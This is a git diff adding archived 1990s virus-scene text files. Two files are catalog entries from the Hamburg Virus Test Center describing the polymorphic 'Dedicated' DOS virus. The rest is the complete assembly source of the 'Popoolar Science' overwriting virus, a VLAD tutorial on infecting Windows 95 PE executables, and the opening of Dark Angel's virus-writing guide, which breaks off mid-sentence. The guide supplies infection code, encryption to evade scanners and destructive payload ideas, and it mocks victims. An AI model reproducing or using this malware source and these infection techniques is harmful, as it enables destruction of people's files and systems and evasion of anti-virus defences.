+Particularities.....: The virus contains a text greeting a US based
+                         female hacker; this text is visible after
+                         decryption.
+--------------------- Agents -----------------------------------------
+Countermeasures.....: Contemporarily, no automatic method for reliable 
+                         identification of polymorphic viruses known.
+- ditto - successful: ---
+Standard means......: ---
+--------------------- Acknowledgement --------------------------------
+Location............: Virus Test Center, University Hamburg, Germany
+Classification by...: Vesselin Bontchev, Klaus Brunnstein
+Documentation by....: Dr. Alan Solomon
+Date................: 31-January-1992
+===================== End of Dedicated Virus =========================
+
+======================================================================
+==  Critical and constructive comments as well as additions are     ==
+==  appreciated. Descriptions of new viruses are appreaciated.      ==
+======================================================================
+== The Computer Virus Catalog may be copied free of charges provided =
+== that the source is properly mentioned at any time and location   ==
+== of reference.                                                    ==
+======================================================================
+==  Editor:   Virus Test Center, Faculty for Informatics            ==
+==            University of Hamburg                                 ==
+==            Vogt-Koelln-Str.30,  D2000 Hamburg 54, FR Germany     ==
+==            Prof. Dr. Klaus Brunnstein, Vesselin Bontchev,        ==
+==            Simone Fischer-Huebner, Wolf-Dieter Jahn              ==  
+==            Tel: (+40) 54715-406 (KB), -225 (Bo/Ja), -405(Secr.)  ==
+==            Fax: (+40) 54 715 - 226                               ==
+==  Email (EAN/BITNET): brunnstein@rz.informatik.uni-hamburg.dbp.de ==
+==                      bontchev@rz.informatik.uni-hamburg.de>      ==
+==  FTP site: ftp.informatik.uni-hamburg.de                         ==
+==    Adress: 134.100.4.42                                          ==
+==            login anonymous; password: your-email-adress;         ==
+==            directory: pub/virus/texts/catalog                    ==
+======================================================================
+
\ No newline at end of file
diff --git a/textfiles.com/virus/polyvir.txt b/textfiles.com/virus/polyvir.txt
new file mode 100644
index 00000000..3c28ab82
--- /dev/null
+++ b/textfiles.com/virus/polyvir.txt
@@ -0,0 +1,107 @@
+Subject:  Polymorphic Virus
+
+Here is a new entry from the Computer Virus Catalog, produced and 
+distributed by the Computer Anti-Virus Researcher's Organization (CARO),
+at the University of Hamburg.
+  
+Note the description of the Polymorphic Method, below, and that this
+virus can presently be detected in a file only by the file change it
+produces.
+
+
+==== Computer Virus Catalog 1.2: Dedicated Virus (31-January 1992) ===
+Entry...............: Dedicated Virus
+Alias(es)...........: ---
+Virus Strain........: ---
+Polymorphism engine.: Mutating Engine (ME) 0.9
+Virus detected when.: UK
+              where.: January 1992
+Classification......: Polymorphic encrypted program (COM) infector, 
+                         non-resident
+Length of Virus.....: 3,5 kByte (including Mutating Engine)
+--------------------- Preconditions ----------------------------------
+Operating System(s).: MS-DOS
+Version/Release.....: 2.xx upward
+Computer model(s)...: IBM - PCs, XT, AT, upward and compatibles
+--------------------- Attributes -------------------------------------
+Easy Identification.: COM file growth (no other direct detection means
+                         are known as virus encrypts itself, and due 
+                         to the installed mutation engine, all occu-
+                         rences of this virus differ widely)
+Type of infection...: COM file infector: all COM files in current 
+                         directory on current drive (disk,diskette)
+                         are infected upon executing an infected file.
+Infection Trigger...: Execution of an infected COM file.
+Media affected......: Hard disk, any floppy disk
+Interrupts hooked...: ---
+Crypto method.....: The virus encrypts itself upon infecting a COM 
+                         file using its own encryption routine; upon
+                         execution, the virus decrypts itself using
+                         its own small algorithm. 
+Polymorphic method..: After decryption, the virus' envelope consisting
+                         of Mutating Engine 0.9 will widely vary the
+                         virus' coding before newly infecting another
+                         COM file. Due to this method, common pieces 
+                         of code of more than three bytes (=signatures)
+                         of any two instances of this virus are highly
+                         improbable. 
+                      Remark: Mutating Engine 0.9 very probably was
+                         developed by the Bulgarian virus writer 
+                         "Dark Avenger"; such a program was announced
+                         early 1991 as permutating more than 4 billion
+                         times, and it appeared in October 1991 or 
+                         before.
+                         The class of permutating viruses is named 
+                         "polymorphic" to indicate the changing 
+                         structure which may not be identified with 
+                         contemporary means. To indicate the relation
+                         to such common engine, the term "Polymorhic 
+                         engine (method)" has been introduced.
+                         ME 0.9 was distributed via several Virus 
+                         Exchange Bulletin Boards, so it is possible 
+                         that other ME 0.9 related viruses appear. 
+                         According to (non-validated) information, an-
+                         other ME 0.9 based virus (Pogue?) has been
+                         detected in North America: COM file infector,
+                         memory resident, length about 3,7 kBytes.
+Damage..............: Virus overwrites at random times random sectors
+                         (one at a time) with garbage (INT 26 used).
+Damage Trigger......: Random time
+Similarities........: ---
+Particularities.....: The virus contains a text greeting a US based
+                         female hacker; this text is visible after
+                         decryption.
+--------------------- Agents -----------------------------------------
+Countermeasures.....: Contemporarily, no automatic method for reliable 
+                         identification of polymorphic viruses known.
+- ditto - successful: ---
+Standard means......: ---
+--------------------- Acknowledgement --------------------------------
+Location............: Virus Test Center, University Hamburg, Germany
+Classification by...: Vesselin Bontchev, Klaus Brunnstein
+Documentation by....: Dr. Alan Solomon
+Date................: 31-January-1992
+===================== End of Dedicated Virus =========================
+
+======================================================================
+==  Critical and constructive comments as well as additions are     ==
+==  appreciated. Descriptions of new viruses are appreaciated.      ==
+======================================================================
+== The Computer Virus Catalog may be copied free of charges provided =
+== that the source is properly mentioned at any time and location   ==
+== of reference.                                                    ==
+======================================================================
+==  Editor:   Virus Test Center, Faculty for Informatics            ==
+==            University of Hamburg                                 ==
+==            Vogt-Koelln-Str.30,  D2000 Hamburg 54, FR Germany     ==
+==            Prof. Dr. Klaus Brunnstein, Vesselin Bontchev,        ==
+==            Simone Fischer-Huebner, Wolf-Dieter Jahn              ==  
+==            Tel: (+40) 54715-406 (KB), -225 (Bo/Ja), -405(Secr.)  ==
+==            Fax: (+40) 54 715 - 226                               ==
+==  Email (EAN/BITNET): brunnstein@rz.informatik.uni-hamburg.dbp.de ==
+==                      bontchev@rz.informatik.uni-hamburg.de>      ==
+==  FTP site: ftp.informatik.uni-hamburg.de                         ==
+==    Adress: 134.100.4.42                                          ==
+==            login anonymous; password: your-email-adress;         ==
+==            directory: pub/virus/texts/catalog                    ==
+======================================================================
diff --git a/textfiles.com/virus/popscia86.vir b/textfiles.com/virus/popscia86.vir
new file mode 100644
index 00000000..3bb4da54
--- /dev/null
+++ b/textfiles.com/virus/popscia86.vir
@@ -0,0 +1,122 @@
+;Popoolar Science virus - a very simple overwriting infector
+;published in Crypt Newsletter 11, Dec. 1992. Edited by Urnst Kouch
+;
+;Popoolar Science is an indiscriminate, primitive over-writing
+;virus which will attack all files in the current directory.
+;Data overwritten by the virus is unrecoverable. Programs overwritten
+;by Popoolar Science are infectious if their size does not exceed the
+;64k boundary for .COM programs. .EXE's larger than this will not
+;spread the virus; DOS will issue an "out of memory" message when the
+;ruined program is loaded. Ruined programs of any type can only be erased
+;from the disk to curb infection.  
+;
+;If Popoolar Science is called into the root directory, the system files
+;will be destroyed, resulting in a machine hang on start-up.
+;
+;Popoolar Science does not look for a ident-marker in infected files - it 
+;merely overwrites all files in the current directory repeatedly. Indeed,
+;there seems no need for a self-recognition routine in such a simple 
+;program of limited aims. 
+;
+;
+;Popoolar Science will assemble directly to a .COMfile using Isaacson's
+;A86 assembler. Use of a MASM/TASM compatible assembler will require
+;addition of a set of declarative statements.
+;
+;Virus signature suitable for loading into VIRSCAN.DAT files of TBScan,
+;McAfee's SCAN and/or F-PROT 2.0x:
+;[POP]
+;DE B8 01 43 33 C9 8D 54 1E CD 21 B8 02 3D CD 21    
+
+nosewheel:
+
+
+		jmp     virubegin              ; get going
+
+virubegin:      push    cs
+		pop     ds
+		mov     dx,offset msg           
+		mov     ah,09h                 ; Display subscription 
+		int     21h                    ; endorsement for Popular
+					       ; Science magazine.
+
+	   
+		mov     dx,offset file_mask     ; load filemask for "*.*"
+		call    find_n_infect          ; infect a file, no need for
+						; an error routine - if no
+						; files found, virus will
+						; rewrite itself.
+		mov     ax,04C00h               ; exit to DOS 
+		int     021h
+
+
+find_n_infect:
+		push    bp                      
+
+		mov     ah,02Fh                 ; get DTA 
+		int     021h
+		push    bx                      ; Save old DTA 
+
+		mov     bp,sp                   ; BP points to local buffer
+		sub     sp,128                  ; Allocate 128 bytes on stack
+
+		push    dx                      ; Save filemask
+		mov     ah,01Ah                 ; DOS set DTA function
+		lea     dx,[bp - 128]           ; DX points to buffer
+		int     021h
+
+		mov     ah,04Eh                 ; search for first host file 
+		mov     cx,00100111b            ; CX holds all attributes
+		pop     dx                      ; Restore file mask
+findfilez:      int     021h
+		jc      reset               ; reset DTA and get ready to exit
+		call    write2file              ; Infect file!
+		mov     ah,04Fh                  
+		jmp     short findfilez         ; find another host file
+
+reset:          mov     sp,bp                   
+		mov     ah,01Ah                 
+		pop     dx                      ; Retrieve old DTA address
+		int     021h
+
+		pop     bp                      
+		ret                              
+
+
+write2file:           ; subroutine, writes virus over beginning of all files
+		mov     ah,02Fh                 ; DOS get DTA address function
+		int     021h
+		mov     si,bx                   
+
+
+		mov     ax,04301h               ; set file attributes
+		xor     cx,cx                   
+		lea     dx,[si + 01Eh]          ; DX points to target handle
+		int     021h
+
+		mov     ax,03D02h               ; open file, read/write
+		int     021h                    ; do it!
+		xchg    bx,ax                   ; put handle in BX
+
+		mov     ah,040h            ; write to file, start at beginning 
+		mov     cx,tailhook - nosewheel  ; CX = virus length
+		mov     dx,offset nosewheel     ; DX points to start of virus
+		int     021h                    ; do it now!
+
+		mov     ax,05701h               
+		mov     cx,[si + 016h]          ; CX holds old file time
+		mov     dx,[si + 018h]          ; DX holds old file date
+		int     021h                    ; restore them
+
+		mov     ah,3Eh                  ; close file 
+		int     021h
+
+
+exit:                                           ; exit, dummeh!
+		ret                              
+
+file_mask        db   "*.*",0               ; Filemask for all files
+msg              db   'PopooLar ScIencE RoolZ!$'  ;Popular Science mag message
+
+tailhook:
+
diff --git a/textfiles.com/virus/portexec.txt b/textfiles.com/virus/portexec.txt
new file mode 100644
index 00000000..e3e79374
--- /dev/null
+++ b/textfiles.com/virus/portexec.txt
@@ -0,0 +1,220 @@
+
+
+                  Infection of Portable Executables
+                                by
+                      Qark and Quantum [VLAD]
+
+
+  The portable executable format is used by Win32, Windows NT and Win95,
+  which makes it very popular and likely to become the dominant form of
+  executable sometime in the future.  The NE header used by Windows 3.11
+  is completely different to the PE header and the two should not be
+  confused.
+
+  None of the techniques in this document have been tested on Windows NT
+  because no virus writer (we know) has access to it.
+   
+  At the bottom of this document is a copy of the PE format, which is not
+  easy to follow but is the only reference publicly available.  Turbo
+  Debugger 32 (TD32) is the debugger used during the research of this
+  text, but SoftIce'95 also does the job.
+
+  Calling Windows 95 API
+  ����������������������
+
+  A legitimate application calls win95 api by the use of an import
+  table.  The name of every API that the application wants to call is
+  put in the import table.  When the application is loaded, the data
+  needed to call the API is filled into the import table.  As was
+  explained in the win95 introduction (go read it), we cannot modify
+  this table due to Microsoft's foresight.
+
+  The simple solution to this problem is to call the kernel directly.
+  We must completely bypass the Win95 calling stucture and go straight
+  for the dll entrypoint.
+
+  To get the handle of a dll/exe (called a module) we can use the API
+  call GetModuleHandle and there are other functions to get the
+  entrypoint of a module - including a function to get the address of an
+  API, GetProcAddress.
+
+  But this raises a chicken and egg question.  How do I call an API so I
+  can call API's, if I can't call API's ?  The solution is to call api
+  that we know are in memory - API that are in KERNEL32.DLL - by calling
+  the address that they are always located at.
+
+  Some Code
+  ���������
+
+  A call to an API in a legitimate application looks like:
+
+        call APIFUNCTIONNAME
+eg.     call CreateFileA
+
+  This call gets assembled to:
+
+        db 9ah          ; call
+        dd ????         ; offset into jump table
+
+  The code at the jump table looks like:
+
+        jmp far [offset into import table]
+
+  The offset into the import table is filled with the address of the
+  function dispatcher for that API function.  This address is obtainable
+  with the GetProcAddress API.  The function dispatcher looks like:
+
+        push function value
+        call Module Entrypoint
+
+  There are API functions to get the entrypoint for any named module but
+  there is no system available to get the value of the function.  If we
+  are calling KERNEL32.DLL functions (of which are all the functions
+  needed to infect executables) then we need look no further than this
+  call.  We simply push the function value and call the module
+  entrypoint.
+
+  Snags
+  �����
+
+  In the final stages of Bizatch we beta tested it on many systems.
+  After a long run of testing we found that the KERNEL32 module was
+  static in memory - exactly as we had predicted - but it was at a
+  different location from the "June Test Release" to the "Full August
+  Release" so we needed to test for this.  What's more, one function
+  (the function used to get the current date/time) had a different
+  function number on the June release than it did on the August release.
+  To compensate I added code that checks to see if the kernel is at one
+  of the 2 possible locations, if the kernel isn't found then the virus
+  doesn't execute and control is returned to the host.
+
+  Addresses and Function Numbers
+  ������������������������������
+
+  For the June Test Release the kernel is found at 0BFF93B95h
+  and for the August Release the kernel is found at 0BFF93C1Dh
+
+  Function              June            August
+  ��������������������������������������������������
+  GetCurrentDir       BFF77744         BFF77744
+  SetCurrentDir       BFF7771D         BFF7771D
+  GetTime             BFF9D0B6         BFF9D14E
+  MessageBox          BFF638D9         BFF638D9
+  FindFile            BFF77893         BFF77893
+  FindNext            BFF778CB         BFF778CB
+  CreateFile          BFF77817         BFF77817
+  SetFilePointer      BFF76FA0         BFF76FA0
+  ReadFile            BFF75806         BFF75806
+  WriteFile           BFF7580D         BFF7580D
+  CloseFile           BFF7BC72         BFF7BC72
+
+
+  Using a debugger like Turbo Debugger 32bit found in Tasm 4.0, other
+  function values can be found.
+
+  Calling Conventions
+  �������������������
+
+  Windows 95 was written in C++ and Assembler, mainly C++.  And although
+  C calling conventions are just as easy to implement, Microsoft didn't
+  use them.  All API under Win95 are called using the Pascal Calling
+  Convention.  For example, an API as listed in Visual C++ help files:
+
+        FARPROC GetProcAddress(
+                HMODULE  hModule,   // handle to DLL module
+                        LPCSTR  lpszProc        // name of function
+        );
+
+  At first it would be thought that all you would need to do is push the
+  handle followed by a pointer to the name of the function and call the
+  API - but no.  Due to Pascal Calling Convention, the parameters need
+  to be pushed in reverse order:
+
+          push offset lpszProc
+          push dword ptr [hModule]
+          call GetProcAddress
+
+  Using a debugger like Turbo Debugger 32bit we can trace the call (one
+  step) and follow it to the kernel call as stated above.  This will
+  allow us to get the function number and we can do away with the need
+  for an entry in the import table.
+
+
+  Infection of the PE Format
+  ��������������������������
+
+  Finding the beginning of the actual PE header is the same as for NE
+  files, by checking the DOS relocations for 40h or more, and seeking to
+  the dword pointed to by 3ch.  If the header begins with a 'NE' it is a
+  Windows 3.11 executable and a 'PE' indicates a Win32/WinNT/Win95 exe.
+
+  Within the PE header is 'the object table', which is the most important
+  feature of the format with regards to virus programming.  To append code
+  to the host and redirect initial execution to the virus it is necessary to
+  add another entry to the 'object table'.  Luckily, Microsoft is obsessed
+  with rounding everything off to a 32bit boundary, so there will be room
+  for an extra entry in the empty space most of the time, which means it
+  isn't necessary to shift any of the tables around.
+
+  
+  A basic overview of the PE infection:
+
+        Locate the offset into the file of the PE header
+        Read a sufficient amount of the PE header to calculate the full size
+        Read in the whole PE header and object table
+        Add a new object to the object table
+        Point the "Entry Point RVA" to the new object
+        Append virus to the executable at the calculated physical offset
+        Write the PE header back to the file
+
+
+  To find the object table:
+   The 'Header Size' variable (not to be confused with the 'NT headersize')
+   is the size of the DOS header, PE header and object table, combined.
+   To read in the object table, read in from the start of the file for
+   headersize bytes.
+
+   The object table immediately follows the NT Header. The 'NTheadersize'
+   value, indicates how many bytes follow the 'flags' field.  So to work
+   out the object table offset, get the NTheaderSize and add the offset
+   of the flags field (24).
+
+  Adding an object:
+   Get the 'number of objects' and multiply it by 5*8 (the size of an object
+   table entry).  This will produce the offset of the space within which
+   the new virus object table entry can be placed.
+   The data for the virus' object table entry needs to be calculated using
+   information in the previous (host) entry.
+
+   RVA             = ((prev RVA + prev Virtual Size)/OBJ Alignment+1)
+                                                               *OBJ Alignment
+   Virtual Size    = ((size of virus+buffer any space)/OBJ Alignment+1)
+                                                               *OBJ Alignment
+   Physical Size   = (size of virus/File Alignment+1)*File Alignment
+   Physical Offset = prev Physical Offset + prev Physical Size
+   Object Flags    = db 40h,0,0,c0h
+   Entrypoint RVA  = RVA
+   
+   Increase the 'number of objects' field by one.
+
+   Write the virus code to the 'physical offset' that was calculated, for
+   'physical size' bytes.
+
+
+  Notes
+  �����
+
+  Microsoft no longer includes the PE header information in their developers
+  CDROMs.  It is thought that this might be to make the creation of
+  viruses for Win95 less likely.  The information contained in the next
+  article was obtained from a Beta of the Win32 SDK CDROM.
+
+
+  Tools
+  �����
+
+  There are many good books available that supply low level Windows 95
+  information.  "Unauthorized Windows 95", although not a particularly
+  useful book (it speaks more of DOS/Windows interaction), supplies
+  utilities on disk and on their WWW site that are far superior to the
+  ones that we wrote to research Win95 infection.
diff --git a/textfiles.com/virus/ps-vir1.txt b/textfiles.com/virus/ps-vir1.txt
new file mode 100644
index 00000000..ea670a94
--- /dev/null
+++ b/textfiles.com/virus/ps-vir1.txt
@@ -0,0 +1,449 @@
+    //==//  //  //  /||      //      //====  //==//  //|   //
+   //  //  //  //  //||     //      //      //  //  //||  //
+  //==//  //==//  //=||    //      //      //  //  // || //
+ //      //  //  //  ||   //      //      //  //  //  ||//
+//      //  //  //   ||  //====  //====  //==//  //   ||/
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+DISCLAIMER: The author hereby disclaims himself
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+DEDICATION: This was written to make the lives
+  of scum such as Patty Hoffman, John McAffee,
+  and Ross Greenberg a living hell.
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+OTHER STUFF:  Thanks go to The Shade of Sorrow,
+  Demogorgon, and Orion Rouge on their comments
+  (which I occasionally listened to!).   Thanks
+  also to Hellraiser, who gave me an example of
+  some virus source code (his own, of course).
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+Dark Angel's Phunky Virus Writing Guide
+---- ------- ------ ----- ------- -----
+Virii are  wondrous creations written for the sole purpose of spreading and
+destroying the  systems of unsuspecting fools.  This eliminates the systems
+of simpletons  who can't  tell that there is a problem when a 100 byte file
+suddenly blossoms  into a  1,000 byte  file.   Duh.  These low-lifes do not
+deserve to  exist, so  it is  our sacred duty to wipe their hard drives off
+the face of the Earth.  It is a simple matter of speeding along survival of
+the fittest.
+
+Why did  I create  this guide?  After writing several virii, I have noticed
+that virus  writers generally  learn how to write virii either on their own
+or by  examining the  disassembled code  of  other  virii.    There  is  an
+incredible lack  of information  on the  subject.   Even books published by
+morons such as Burger are, at best, sketchy on how to create a virus.  This
+guide will show you what it takes to write a virus and also will give you a
+plethora of source code to include in your own virii.
+
+Virus writing  is not  as hard  as you  might first  imagine.   To write an
+effective virus,  however, you  *must*  know  assembly  language.    Short,
+compact code  are hallmarks  of assembly  language and  these are desirable
+characteristics of  virii.  However, it is *not* necessary to write in pure
+assembly.   C may  also be  used, as  it allows almost total control of the
+system while  generating relatively compact code (if you stay away from the
+library functions).   However,  you still  must access  the interrupts,  so
+assembly knowledge  is still  required.  However, it is still best to stick
+with pure  assembly,  since  most  operations  are  more  easily  coded  in
+assembly.  If you do not know assembly, I would recommend picking up a copy
+of The Microsoft Macro Assembler Bible (Nabajyoti Barkakati, ISBN #: 0-672-
+22659-6).   It is an easy-to-follow book covering assembly in great detail.
+Also get yourself a copy of Undocumented DOS (Schulman, et al, ISBN #0-201-
+57064-5), as it is very helpful.
+
+The question  of which  compiler to  use arises  often.   I  suggest  using
+Borland Turbo  Assembler and/or  Borland C++.   I  do not  have a  copy  of
+Zortech C  (it was  too large  to download), but I would suspect that it is
+also a good choice.  Stay away from Microsoft compilers, as they are not as
+flexible nor as efficient as those of other vendors.
+
+A few more items round out the list of tools helpful in constructing virii.
+The latest version of Norton Utilities is one of the most powerful programs
+available, and  is immeasurably  helpful.   MAKE SURE YOU HAVE A COPY!  You
+can find  it on  any decent board.  It can be used during every step of the
+process, from  the writing  to the testing.  A good debugger helps.  Memory
+management  utilities   such  as   MAPMEM,  PMAP,   and  MARK/RELEASE,  are
+invaluable, especially  when coding  TSR virii.   Sourcer,  the  commenting
+disassembler, is  useful when  you wish  to examine the code of other virii
+(this is a good place to get ideas/techniques for your virus).
+
+Now that  you have  your tools,  you are  ready to  create a  work  of  art
+designed to smash the systems of cretins.  There are three types of virii:
+
+     1) Tiny virii (under 500 bytes) which are designed to be  undetectable
+        due to their small size.   TINY  is  one  such  virus.    They  are
+        generally very simple because their code length is so limited.
+     2) Large  virii  (over 1,500 bytes)   which   are   designed   to   be
+        undetectable because they cover their tracks very  well  (all  that
+        code DOES have a use!).  The best example  of  this  is  the  Whale
+        virus, which is perhaps the best 'Stealth' virus in existence.
+     3) Other virii which are not designed to be hidden at all (the writers
+        don't give  a  shit).    The  common  virus  is  like  this.    All
+        overwriting virii are in this category.
+
+You must  decide which  kind of  virus you wish to write.  I will mostly be
+discussing  the  second  type  (Stealth  virii).    However,  many  of  the
+techniques discribed  may be easily applied to the first type (tiny virii).
+However, tiny  virii generally do not have many of the "features" of larger
+virii, such  as  directory  traversal.    The  third  type  is  more  of  a
+replicating trojan-type,  and will  warrant a  brief  (very,  very  brief!)
+discussion later.
+
+A virus may be divided into three parts: the replicator, the concealer, and
+the bomb.   The  replicator part  controls the spread of the virus to other
+files, the concealer keeps the virus from being detected, and the bomb only
+executes when  the activation  conditions of the virus (more on that later)
+are satisfied.
+
+-=-=-=-=-=-=-=-
+THE REPLICATOR
+-=-=-=-=-=-=-=-
+The job  of the  replicator is to spread the virus throughout the system of
+the clod  who has caught the virus.  How does it do this without destroying
+the file it infects?  The easiest type of replicator infects COM files.  It
+first saves  the first  few bytes  of the  infected file.  It then copies a
+small portion of its code to the beginning of the file, and the rest to the
+end.
+
+  +----------------+      +------------+
+  | P1 | P2        |      | V1 | V2    |
+  +----------------+      +------------+
+ The uninfected file     The virus code
+
+In the  diagram, P1 is part 1 of the file, P2 is part 2 of the file, and V1
+and V2  are parts 1 and 2 of the virus.  Note that the size of P1 should be
+the same  as the size of V1, but the size of P2 doesn't necessarily have to
+be the  same size  as V2.   The  virus first  saves P1 and copies it to the
+either 1)  the end  of the  file or 2) inside the code of the virus.  Let's
+assume it copies the code to the end of the file.  The file now looks like:
+
+  +---------------------+
+  | P1 | P2        | P1 |
+  +---------------------+
+
+Then, the  virus copies  the first  part of  itself to the beginning of the
+file.
+
+  +---------------------+
+  | V1 | P2        | P1 |
+  +---------------------+
+
+Finally, the virus copies the second part of itself to the end of the file.
+The final, infected file looks like this:
+
+  +-----------------------------+
+  | V1 | P2        | P1 | V2    |
+  +-----------------------------+
+
+The question  is: What  the fuck  do V1 and V2 do?  V1 transfers control of
+the program to V2.  The code to do this is simple.
+
+     JMP FAR PTR Duh       ; Takes four bytes
+Duh  DW  V2_Start          ; Takes two bytes
+
+Duh is  a far pointer (Segment:Offset) pointing to the first instruction of
+V2.   Note that  the value  of Duh must be changed to reflect the length of
+the file  that is  infected.   For example,  if the  original size  of  the
+program is  79 bytes,  Duh must  be changed  so  that  the  instruction  at
+CS:[155h] is  executed.   The value of Duh is obtained by adding the length
+of V1,  the original size of the infected file, and 256 (to account for the
+PSP).  In this case, V1 = 6 and P1 + P2 = 79, so 6 + 79 + 256 = 341 decimal
+(155 hex).
+
+An alternate, albeit more difficult to understand, method follows:
+
+     DB 1101001b              ; Code for JMP (2 byte-displacement)
+Duh  DW V2_Start - OFFSET Duh ; 2 byte displacement
+
+This inserts  the jump  offset directly  into the  code following  the jump
+instruction.  You could also replace the second line with
+
+     DW V2_Start - $
+
+which accomplishes the same task.
+
+V2 contains the rest of the code, i.e. the stuff that does everything else.
+The last  part of  V2 copies  P1 over  V1 (in memory, not on disk) and then
+transfers control  to the  beginning of the file (in memory).  The original
+program will  then run happily as if nothing happened.  The code to do this
+is also very simple.
+
+     MOV SI, V2_START      ; V2_START is a LABEL marking where V2 starts
+     SUB SI, V1_LENGTH     ; Go back to where P1 is stored
+     MOV DI, 0100h         ; All COM files are loaded @ CS:[100h] in memory
+     MOV CX, V1_LENGTH     ; Move CX bytes
+     REP MOVSB             ; DS:[SI] -> ES:[DI]
+
+     MOV DI, 0100h
+     JMP DI
+
+This code assumes that P1 is located just before V2, as in:
+
+P1_Stored_Here:
+     .
+     .
+     .
+V2_Start:
+
+It also  assumes ES  equals CS.  If these assumptions are false, change the
+code accordingly.  Here is an example:
+
+     PUSH CS               ; Store CS
+     POP  ES               ;  and move it to ES
+                           ; Note MOV ES, CS is not a valid instruction
+     MOV SI, P1_START      ; Move from whereever P1 is stored
+     MOV DI, 0100h         ;  to CS:[100h]
+     MOV CX, V1_LENGTH
+     REP MOVSB
+
+     MOV DI, 0100h
+     JMP DI
+
+This code  first moves CS into ES and then sets the source pointer of MOVSB
+to where  P1 is located.  Remember that this is all taking place in memory,
+so you  need the  OFFSET of P1, not just the physical location in the file.
+The offset  of P1  is 100h  higher than  the physical file location, as COM
+files are loaded starting from CS:[100h].
+
+So here's a summary of the parts of the virus and location labels:
+
+V1_Start:
+     JMP FAR PTR Duh
+Duh  DW  V2_Start
+V1_End:
+
+P2_Start:
+P2_End:
+
+P1_Start:
+  ; First part of the program stored here for future use
+P1_End:
+
+V2_Start:
+  ; Real Stuff
+V2_End:
+
+V1_Length EQU V1_End - V1_Start
+
+Alternatively, you could store P1 in V2 as follows:
+
+V2_Start:
+
+P1_Start:
+P1_End:
+
+V2_End:
+
+That's all there is to infecting a COM file without destroying it!  Simple,
+no?   EXE files,  however, are a little tougher to infect without rendering
+them inexecutable - I will cover this topic in a later file.
+
+Now let  us turn our attention back to the replicator portion of the virus.
+The steps are outlined below:
+
+     1) Find a file to infect
+     2) Check if it is already infected
+     3) If so, go back to 1
+     4) Infect it
+     5) If infected enough, quit
+     6) Otherwise, go back to 1
+
+Finding a  file to  infect is  a  simple  matter  of  writing  a  directory
+traversal procedure  and issuing  FINDFIRST  and  FINDNEXT  calls  to  find
+possible files  to infect.   Once  you find  the file, open it and read the
+first few  bytes.   If they are the same as the first few bytes of V1, then
+the file  is already  infected.  If the first bytes of V1 are not unique to
+your virus,  change it  so that they are.  It is *extremely* important that
+your virus  doesn't reinfect  the same  files, since that was how Jerusalem
+was first  detected.   If the file wasn't already infected, then infect it!
+Infection should take the following steps:
+
+     1) Change the file attributes to nothing.
+     2) Save the file date/time stamps.
+     3) Close the file.
+     4) Open it again in read/write mode.
+     5) Save P1 and append it to the end of the file.
+     6) Copy V1 to the beginning, but change the offset which it JMPs to so
+        it transfers control correctly. See the previous part on infection.
+     7) Append V2 to the end of the file.
+     8) Restore file attributes/date/time.
+
+You should  keep a counter of the number of files infected during this run.
+If the number exceeds, say three, then stop.  It is better to infect slowly
+then to give yourself away by infecting the entire drive at once.
+
+You must  be sure  to cover  your tracks  when you infect a file.  Save the
+file's  original   date/time/attributes  and  restore  them  when  you  are
+finished.   THIS IS VERY IMPORTANT!  It takes about 50 to 75 bytes of code,
+probably less,  to do  these few simple things which can do wonders for the
+concealment of your program.
+
+I will  include code for the directory traversal function, as well as other
+parts of the replicator in the next installment of my phunky guide.
+
+-=-=-=-=-
+CONCEALER
+-=-=-=-=-
+This is  the part  which conceals  the program  from notice by the everyday
+user and virus scanner.  The simplest form of concealment is the encryptor.
+The code for a simple XOR encryption system follows:
+
+encrypt_val   db   ?
+
+decrypt:
+encrypt:
+     mov ah, encrypt_val
+
+     mov cx, part_to_encrypt_end - part_to_encrypt_start
+     mov si, part_to_encrypt_start
+     mov di, si
+
+xor_loop:
+     lodsb                 ; DS:[SI] -> AL
+     xor al, ah
+     stosb                 ; AL -> ES:[DI]
+     loop xor_loop
+     ret
+
+Note the encryption and decryption procedures are the same.  This is due to
+the weird  nature of  XOR.   You can CALL these procedures from anywhere in
+the program,  but make sure you do not call it from a place within the area
+to be  encrypted, as  the program  will crash.  When writing the virus, set
+the encryption  value to  0.  part_to_encrypt_start and part_to_encrypt_end
+sandwich the area you wish to encrypt.  Use a CALL decrypt in the beginning
+of V2  to unencrypt  the file  so your  program can  run.  When infecting a
+file, first change the encrypt_val, then CALL encrypt, then write V2 to the
+end of the file, and CALL decrypt.  MAKE SURE THIS PART DOES NOT LIE IN THE
+AREA TO BE ENCRYPTED!!!
+
+This is how V2 would look with the concealer:
+
+V2_Start:
+
+Concealer_Start:
+  .
+  .
+  .
+Concealer_End:
+
+Replicator_Start:
+  .
+  .
+  .
+Replicator_End:
+
+Part_To_Encrypt_Start:
+  .
+  .
+  .
+Part_To_Encrypt_End:
+V2_End:
+
+Alternatively, you  could move  parts  of  the  unencrypted  stuff  between
+Part_To_Encrypt_End and V2_End.
+
+The value  of encryption  is readily  apparent.  Encryption makes it harder
+for virus  scanners to  locate your virus.  It also hides some text strings
+located in  your program.   It is the easiest and shortest way to hide your
+virus.
+
+Encryption is only one form of concealment.  At least one other virus hooks
+into the  DOS interrupts  and alters  the output  of DIR  so the file sizes
+appear normal.   Another  concealment scheme  (for TSR virii) alters DOS so
+memory utilities  do not  detect the  virus.   Loading the virus in certain
+parts of  memory allow  it to survive warm reboots.  There are many stealth
+techniques, limited only by the virus writer's imagination.
+
+-=-=-=-=-
+THE BOMB
+-=-=-=-=-
+So now all the boring stuff is over.  The nastiness is contained here.  The
+bomb part  of the virus does all the deletion/slowdown/etc which make virii
+so annoying.   Set  some activation  conditions of  the virus.  This can be
+anything, ranging  from when  it's your  birthday to  when  the  virus  has
+infected 100  files.   When these  conditions are met, then your virus does
+the good stuff.  Some suggestions of possible bombs:
+
+     1) System slowdown - easily  handled  by  trapping  an  interrupt  and
+        causing a delay when it activates.
+     2) File deletion - Delete all ZIP files on the drive.
+     3) Message display - Display a nice message saying  something  to  the
+        effect of "You are fucked."
+     4) Killing/Replacing the Partition Table/Boot Sector/FAT of  the  hard
+        drive - This is very nasty, as most dimwits cannot fix this.
+
+This is, of course, the fun part of writing a virus, so be original!
+
+-=-=-=-=-=-=-=-
+OFFSET PROBLEMS
+-=-=-=-=-=-=-=-
+There is  one caveat  regarding calculation of offsets.  After you infect a
